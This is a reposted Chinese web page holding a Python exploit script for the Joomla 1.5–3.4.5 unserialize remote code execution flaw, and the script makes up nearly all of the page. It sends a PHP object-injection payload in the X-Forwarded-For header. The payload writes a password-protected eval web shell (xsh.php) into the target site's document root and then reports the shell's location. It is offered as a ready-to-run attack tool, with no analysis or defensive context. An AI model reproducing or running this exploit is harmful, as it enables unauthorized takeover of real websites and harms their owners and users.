首页 > 系统服务 > 详细

Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)

时间:2016-02-16 20:37:59      阅读:960      评论:0      收藏:0      [点我收藏+]

# coding=utf-8
# author:KuuKi
# Help: joomla 1.5-3.4.5 unserialize remote code execution

import urllib2
import cookielib,sys
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
urllib2.socket.setdefaulttimeout(10)

payload = ‘file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47).”xsh.php”,”\x3C”.chr(63).”@eval(\x5C\x24_POST[x]);”);’

forward = ‘}__test|O:21:”JDatabaseDriverMysqli”:3:{s:2:”fc”;O:17:”JSimplepieFactory”:0:{}s:21:”\x5C0\x5C0\x5C0disconnectHandlers”;a:1:{i:0;a:2:{i:0;O:9:”SimplePie”:5:{s:8:”sanitize”;O:20:”JDatabaseDriverMysql”:0:{}s:8:”feed_url”;s:’ + str(len(payload)+28) + ‘:”‘ + payload + ‘;JFactory::getConfig();exit;”;s:19:”cache_name_function”;s:6:”assert”;s:5:”cache”;b:1;s:11:”cache_class”;O:20:”JDatabaseDriverMysql”:0:{}}i:1;s:4:”init”;}}s:13:”\x5C0\x5C0\x5C0connection”;b:1;}\xF0\x9D\x8C\x86′
req = urllib2.Request(url=sys.argv[1],headers={‘x-forwarded-for’:forward})
opener.open(req)
req = urllib2.Request(url=sys.argv[1])
if ‘SimplePie_Misc::parse_url’ in opener.open(req).read():
print ‘Shell: ‘+ sys.argv[1] + ‘/xsh.php Password: x’
else:
print ‘Unvunerable!’

Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)

原文:http://www.cnblogs.com/milantgh/p/5193723.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!